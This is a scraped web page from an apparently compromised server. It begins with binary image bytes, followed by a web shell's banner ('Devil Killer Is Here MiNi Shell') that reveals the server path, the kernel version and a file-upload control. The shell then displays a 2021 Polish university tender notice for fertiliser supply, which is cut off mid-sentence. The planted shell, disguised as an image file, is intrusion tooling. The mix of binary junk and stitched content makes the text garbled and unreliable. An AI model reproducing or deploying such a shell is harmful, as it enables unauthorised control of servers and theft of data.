JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210318/0001923701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00019237 z dnia 2021-03-18</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa nawozów mineralnych pod zasiewy wiosenne w Stacji Badawczo Dydaktycznej w Swojczycach i Radomierzu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Przyrodniczy we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001867</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">C.K. Norwida 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-375</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">miroslaw.lukaszuk@upwr.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.upwr.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Uczelnia publiczna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa nawozów mineralnych pod zasiewy wiosenne w Stacji Badawczo Dydaktycznej w Swojczycach i Radomierzu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f8c02dda-87b0-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00019237</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://upwr.logintrade.net/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://upwr.logintrade.net/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: 1. Niniejszepostępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformyzakupowej (dalej jako „Platforma”) pod adresem:https://upwr.logintrade.net/ 2. Komunikacja wpostępowaniu o udzielenie zamówienia, w tym składanie ofert, , wymiana informacji orazprzekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniemwyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej, tj.Platformy Przetargowej Zamawiającego (zwanej dalej „Platformą”) dostępnej pod adresem:https://upwr.logintrade.net/3. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowaniedanych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danychprzesyłanych przez Internet. 4. W celu złożenia, zmiany, wycofania oferty oraz w celu porozumiewaniasię z Zamawiającym po otwarciu ofert, Wykonawca musi posiadać konto na Platformie, to znaczy byćzarejestrowanym użytkownikiem Platformy.5. Aby zwrócić się do Zamawiającego o wyjaśnienie treściSWZ, Wykonawca nie musi posiadać konta na Platformie. 6. Prawidłowym złożeniem oferty przezWykonawcę za pomocą środka komunikacji elektronicznej jest jej złożenie na Platformie dostępnej podadresem https://upwr.logintrade.net/rejestracja/ustawowe.html w wierszu oznaczonym tytułem orazznakiem sprawy niniejszego postępowania. 7. Korzystanie z Platformy przez Wykonawcę jestbezpłatne.8. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny zInstrukcją korzystania z Platformy Przetargowej Zamawiającego (zwanej dalej „Platformą”) dostępnejpod adresem: https://upwr.logintrade.net/, w szczególności za sytuację, gdy Zamawiający zapozna sięz treścią oferty przed upływem terminu składania ofert . Taka oferta zostanie uznana przezZamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniuponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy Prawo Zamówień Publicznych.9. Czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Czas przekazania danych jest to czas,w którym zostanie potwierdzone złożenie oferty, dokumentu przez Wykonawcę. W wypadkuWykonawcy zalogowanego na Platformie, czas przekazania danych jest to czas wysłania dokumentu,oferty przez Platformę. W wypadku wybrania opcji złożenia oferty bez logowania, potwierdzenieodbywa się poprzez kliknięcie w link dostępny w wiadomości mailowej, która jest wysyłanaautomatycznie do Wykonawcy po złożeniu oferty, dokumentu. Wiadomość otrzymuje Wykonawca naadres e-mail wskazany w formularzu po kliknięciu w ikonę „Złóż ofertę”. 10. We wszelkiejkorespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują sięnumerem postępowania nadanym przez Zamawiającego I0CZZ000 271.11.2021, postępowania</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z04.05.2016, str. 1), dalej „RODO”, Zamawiający, Uniwersytet Przyrodniczy we Wrocławiu informuje, że:administratorem Pani/Pana danych osobowych jest Uniwersytet Przyrodniczy we Wrocławiu, ul. C.K.Norwida 25, 50-375 Wrocław. Reprezentuje go Rektor; o celach i sposobach przetwarzania danychosobowych podawanych w związku z realizacją procedur udzielania zamówień publicznychUniwersytetu Przyrodniczego we Wrocławiu decyduje on sam jako administrator danych; Administratorwyznaczył osobę pełniącą zadania Inspektora Danych Osobowych i można się z nim skontaktowaćpoprzez adres e-mail: iod@upwr.edu.pl; Pani/Pana dane osobowe przetwarzane będą na podstawieart. 6 ust. 1 lit. c RODO w celu wyłonienia wykonawcy w przedmiotowym postępowaniu o udzieleniezamówienia publicznego, przeprowadzonym zgodnie z ustawą Pzp; odbiorcami Pani/Pana danychosobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania woparciu o art. 74 ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych (tekst jedn. –Dz. U. z 2019 r., ze zm.) zwanej dalej- „ustawa Pzp”; Okres przechowywania zgodnie z art. 78 ust. 1ustawy Pzp, przez okres 4Pani/Pana dane osobowych wynosi odpowiednio: jeżeli czas trwania umowyprzekraczalat od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku zamówień4lata, okres przechowywania obejmuje cały czas trwania umowy; współfinansowanych ze środków UEprzez okres, o którym mowa w art. 125 ust 4 lit d) w zw z art. 140 Rozporządzenia ParlamentuEuropejskiego i Rady (UE) nr 1303/2013. obowiązek podania przez Panią/Pana danych osobowychbezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawyPzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencjeniepodania określonych danych wynikają z ustawy Pzp. ;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Udostępnienie danych osobowych jest warunkiem zawarciaumowy o zamówienie publiczne; konsekwencją nie udostępnienia do przetwarzania danych osobowychbędzie odrzucenie złożonej oferty lub wykluczenie wykonawcy z postępowania o udzieleniezamówienia publicznego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">I0CZZ000.271.11.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 185621,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są dostawy nawozów pod nazwą: dostawa nawozów mineralnychpod zasiewy wiosenne w Stacji Badawczo Dydaktycznej w Swojczycach i Radomierzu 2.Szczegółowy opis sposobu realizacji przedmiotu zamówienia został określony w Opisieprzedmiotu zamówienia (załącznik nr 6 do SWZ) oraz we wzorze umowy stanowiącym załączniknr 5 do SWZ.3. WARUNKI GWARANCJI I RĘKOJMI: Zamawiający wymaga aby Wykonawcaudzielił, na cały przedmiot zamówienia, minimum 12 miesiące gwarancji i rękojmi, licząc od datyodbioru końcowego bez wad. Szczegóły dotyczące rękojmi i gwarancji znajdują się w treściwzoru umowy stanowiącym załącznik nr 5 do SWZ.Zamawiający informuje, że gwarancja irękojmia stanowią jedno z kryterium oceny ofert i może ulec wydłużeniu na warunkachokreślonych w Rozdziale 18 SWZ.4. Warunki płatności: szczegółowe warunki i sposób płatnościzostały określone we wzorze umowy stanowiącym Załącznik 5 do SWZ . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24440000-0 - Różne nawozy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonałnależycie jedną dostawę mebli o wartości co najmniej 100 tys. zł brutto . <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu:oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa wRozdziale 17, w pkt. 1.1 SWZ, w zakresie podstaw wykluczenia z postępowania wskazanych przezZamawiającego w zakresie przesłanek, o których mowa w art. 108 ust. 1 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie spełnianiawarunków udziału w postępowaniu: Wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3lat wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jestkrótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania orazpodmiotów, na rzecz których dostawy te zostały wykonane oraz załączeniem dowodów określającychczy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądźinne dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanieuzyskać tych dokumentów – inne odpowiednie dokumenty – zgodnie z załącznikiem nr 4 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawców wspólnie; W przypadku wspólnego ubiegania się o zamówienia przezWykonawców, oświadczenie o spełnianiu warunków udziału w postępowaniu składa ichpełnomocnik. W wypadku wspólnego ubiegania się o zamówienie przez Wykonawców,oświadczenie o niepodleganiu wykluczeniu składa każdy z Wykonawców. W przypadku złożeniaoferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia składająpodmiotowe środki dowodowe, potwierdzające, że co co najmniej jeden z wykonawców spełniawarunki udziału w postepowaniu. W przypadku gdy podmiotowe środki dowodowe,przedmiotowe środki dowodowe, inne dokumenty lub dokumenty potwierdzające umocowaniedo reprezentowania odpowiednio Wykonawcy, Wykonawców wspólnie ubiegających się oudzielenie zamówienia publicznego, podmiotu udostępniającego zasoby na zasadachokreślonych w art. 118 ustawy Pzp zwane „dokumentami potwierdzającymi umocowanie doreprezentowania”, zostały wystawione przez upoważnione podmioty inne niż Wykonawca,Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasobylub podwykonawca, zwane dalej „upoważnionymi podmiotami”, jako dokument elektroniczny,przekazuje się ten dokument.W przypadku Wykonawców wspólnie ubiegających się o udzieleniezamówienia (art. 58 ustawy Pzp), Zamawiający wymaga, aby poręczenie lub gwarancjawadialna obejmowała swą treścią (tj.: zobowiązanych z tytułu poręczenia lub gwarancji)wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treściwynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzieleniezamówienia (konsorcjum). Przed podpisaniem umowy Wykonawcy wspólnie ubiegający się oudzielenie zamówienia (w przypadku wyboru ich oferty, jako najkorzystniejszej) przedstawiąZamawiającemu umowę regulującą współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podst. art. 455 ust. 1 ustawy Pzp, Zamawiający dopuszcza wprowadzenie zmian doumowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy orazokreśla warunki tych zmian poprzez dopuszczenie możliwości zmian umowy w formiepisemnego aneksu dotyczącego w szczególności:1) dopuszcza się zmianę terminu realizacjizamówienia w następujących sytuacjach: a) z przyczyn nie leżących po stronie Wykonawcy, b) zprzyczyn leżących po stronie Zamawiającego, c) z powodu wystąpienia siły wyższej, 2) innezmiany:a) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresiemającym wpływ na realizację przedmiotu zamówienia, lub wynikających z prawomocnychorzeczeń lub ostatecznych aktów administracyjnych właściwych organów - w takim zakresie, wjakim będzie to niezbędne w celu dostosowania postanowień Umowy do zaistniałego stanuprawnego lub faktycznego,b) możliwa jest zmiana umowy w zakresie podwykonawstwa naetapie realizacji umowy, za uprzednią zgodą zamawiającego, o ile nie sprzeciwia się topostanowieniom SWZ, tj.:- powierzenie Podwykonawcom innego zakresu dostawy niż wskazanyw ofercie Wykonawcy,- zmiana Podwykonawcy na etapie realizacji zamówienia, - wprowadzenienowego Podwykonawcy, również w przypadku, gdy Wykonawca wskazał w ofercie, żezamówienie wykona samodzielnie, c) jeżeli nastąpi zmiana przepisów prawa podatkowego wszczególności zmiany stawki podatku VAT wynagrodzenie należne Wykonawcy podlegaautomatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą ze stawki tegopodatku obowiązującej w chwili powstania obowiązku podatkowego. W takim przypadkuwysokość wynagrodzenia należnego Wykonawcy ustalana jest każdorazowo z uwzględnieniemaktualnej stawki podatku VAT obowiązującej na dzień wystawienia faktury (powstaniaobowiązku podatkowego). d) Zamawiający dopuszcza możliwość zmiany ustaleń umowy wstosunku do treści oferty Wykonawcy, niepowodujące zwiększenia wynagrodzenia Wykonawcy,w zakresie, jakości lub innych parametrów zaoferowanych w ofercie produktów, przy czymzmiana taka musi być spowodowana:• niedostępnością na rynku produktów wskazanych wofercie wynikającą z zaprzestania produkcji lub wycofania ich z rynku • pojawieniem się na rynkuproduktów nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotuzamówienia lub kosztów eksploatacji przedmiotu zamówienia;• pojawieniem się na rynkuproduktów o lepszych parametrach niż wskazane w ofercie pod warunkiem, że zmianywskazane powyżej nie spowodują zwiększenia ceny ofertowej.2. Warunki dokonywania zmian:1)inicjowanie zmian na wniosek Wykonawcy lub Zamawiającego,2) uzasadnienie zmianyprawidłową realizacją przedmiotu umowy,3) forma pisemna pod rygorem nieważności w formieaneksu do umowy,3. Zmiana umowy dokonana z naruszeniem powyższych zasad podlegaunieważnieniu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-03-26 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę wraz z wymaganymi dokumentami należy umieścić na Platformie pod adresem: https://upwr.logintrade.net/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-03-26 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-04-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Środki ochrony prawnej określone w Dziale IX ustawy Pzp przysługują Wykonawcy,uczestnikowi konkursu oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniuzamówienia lub nagrody w konkursie oraz poniósł lub może ponieść szkodę w wynikunaruszenia przez Zamawiającego przepisów ustawy. 2. Środki ochrony prawnej wobecogłoszenia wszczynającego postępowanie o udzielenie zamówienia lub ogłoszenia o konkursieoraz dokumentów zamówienia przysługują również 